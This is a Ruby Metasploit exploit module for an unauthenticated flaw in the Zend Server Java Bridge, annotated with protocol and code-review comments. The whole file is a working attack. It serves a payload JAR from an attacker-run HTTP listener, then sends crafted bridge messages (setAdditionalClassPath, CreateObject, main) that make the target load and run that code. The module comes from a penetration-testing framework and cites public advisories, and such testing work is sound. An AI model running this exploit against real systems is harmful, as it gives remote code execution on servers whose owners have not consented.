##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Zend Server Java Bridge module.
#
# Flow, as implemented below: an HTTP listener is started to serve a JAR
# containing the payload; the Java Bridge is then asked over its TCP protocol
# to add that JAR's URL to its class path ("setAdditionalClassPath"), to
# instantiate "metasploit.Payload" ("CreateObject"), and to invoke "main" on
# the returned object. No credentials are exchanged at any step, which is the
# trust issue the module description refers to.
#
# Mixins: HttpServer is presumably what provides start_service, get_uri and
# send_response; Tcp presumably provides connect and sock (neither is defined
# in this file).
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Tcp

  # Module metadata. Both targets carry an empty options hash because the
  # delivered payload is Java (ARCH_JAVA) and nothing target-specific is used
  # in the protocol below. RPORT defaults to 10001, the bridge port this
  # module talks to.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zend Server Java Bridge Arbitrary Java Code Execution',
      'Description'    => %q{
          This module takes advantage of a trust relationship issue within the
          Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
          between PHP and Java code within Zend Server.

          When Java code is encountered Zend Server communicates with the Java Bridge. The
          Java Bridge then handles the java code and creates the objects within the Java Virtual
          Machine. This interaction however, does not require any sort of authentication. This
          leaves the JVM wide open to remote attackers. Sending specially crafted data to the
          Java Bridge results in the execution of arbitrary java code.
      },
      'Author'         => [ 'bannedit' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'OSVDB', '71420'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/'],
          [ 'URL', 'http://www.exploit-db.com/exploits/17078/' ],
        ],
      'Platform'       => ['java'], # win
      'Arch'           => ARCH_JAVA,
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Linux', {}],
          [ 'Windows', {}],
        ],
      'DisclosureDate' => 'Mar 28 2011',
      'DefaultTarget'  => 0))

    register_options( [ Opt::RPORT(10001) ], self.class)
  end

  # Entry point: bring up the HTTP listener that serves the payload JAR
  # (on_request_uri below), then start the bridge conversation.
  def exploit
    start_service()
    send_java_require
  end

  # First bridge request: "setAdditionalClassPath" with the URL of the JAR
  # this module serves. Wire layout, as assembled here:
  #   4 bytes  0xffffffff           (fixed; role not documented in this file)
  #   4 bytes  00 00 00 16          (22 = length of "setAdditionalClassPath";
  #                                  written as 0x16000000 through 'V', so the
  #                                  bytes land big-endian)
  #   22 bytes "setAdditionalClassPath"
  #   8 bytes  two fixed words      (presumably argument count / type — TODO confirm)
  #   1 byte   path length
  #   n bytes  path
  # The whole buffer is then prefixed with its own length as a big-endian
  # 32-bit word ('N'). Calls create_and_exec once the request has been sent.
  def send_java_require()
    connect

    # 1..8 random letters so the JAR name differs on every run.
    jar = rand_text_alpha(rand(8)+1) + '.jar'
    path = get_uri + '/' + jar
    uri_len = path.length

    java_require = [0xffffffff, 0x16000000].pack('V*') +
      "setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
      # NOTE(review): 'C' keeps only the low 8 bits of uri_len, so a path longer
      # than 255 characters would be sent with a wrong length prefix.
      [uri_len].pack('C') + path

    # Length prefix covers everything built above (excludes itself).
    java_require = [java_require.length].pack('N') + java_require

    print_status("Sending java_require() request... #{path}")
    sock.put(java_require)
    # The reply is read but never inspected; a refused or garbled response is
    # not detected here.
    res = sock.get_once

    select(nil, nil, nil, 5) # wait for the request to be handled
    create_and_exec
  end

  # Second and third bridge requests on the same socket.
  #
  # create_obj ("CreateObject" on "metasploit.Payload"): the leading word is
  # 0x34 (52), which equals the byte length of everything that follows it in
  # this message, i.e. the same length-prefix convention send_java_require
  # applies with pack('N'). The second word (0x00000000) sits where the object
  # handle goes in callmain. The 00 00 00 0c word is the name length (12) and
  # the 0x12 byte the class-name length (18). Remaining fixed words are
  # reproduced as-is; their meaning is not documented in this file.
  #
  # callmain ("main" on the object the bridge returned): leading word 0x1f
  # (31), again the length of the rest of the message; then the 4-byte object
  # id copied from the CreateObject reply; then 00 00 00 04 + "main"; then
  # fixed words and three zero bytes.
  def create_and_exec
    print_status("Sending Final Java Bridge Requests")

    create_obj =
      [0x34000000, 0x00000000, 0x0c000000].pack('V*') +
      "CreateObject" +
      [0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
      "metasploit.Payload" +
      [0x07000000].pack('N') + [0x00].pack('C')

    sock.put(create_obj)
    res = sock.get_once
    # Object handle: 4 bytes at offset 5 of the reply, spliced into callmain
    # below at the position create_obj filled with 0x00000000.
    # NOTE(review): res is nil if the bridge closed without replying; this line
    # would then raise NoMethodError rather than reporting a clean failure.
    obj_id = res[5,4]

    callmain =
      [0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
      [0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +
      [0x00].pack('C') + [0x00].pack('C')

    sock.put(callmain)
    # Reply discarded; success is only observed through the handler below.
    sock.get_once

    handler()
  end

  # HTTP handler for the listener started in exploit: a request whose URI ends
  # in ".jar" (case-insensitive) is answered with the encoded payload as a
  # java-archive; any other request gets no response from this method.
  #
  # @param cli     client connection passed by the HttpServer mixin
  # @param request parsed request; only request.uri is consulted
  def on_request_uri(cli, request)
    # NOTE(review): `$` matches before a trailing newline as well as at the end
    # of the string; `\z` is the anchor for "ends with" on the whole URI.
    if request.uri =~ /\.jar$/i
      send_response(cli, payload.encoded,
        {
          'Content-Type' => 'application/java-archive',
          'Connection'   => 'close',
          'Pragma'       => 'no-cache'
        })

      print_status("Replied to Request for Payload JAR")
    end
  end

end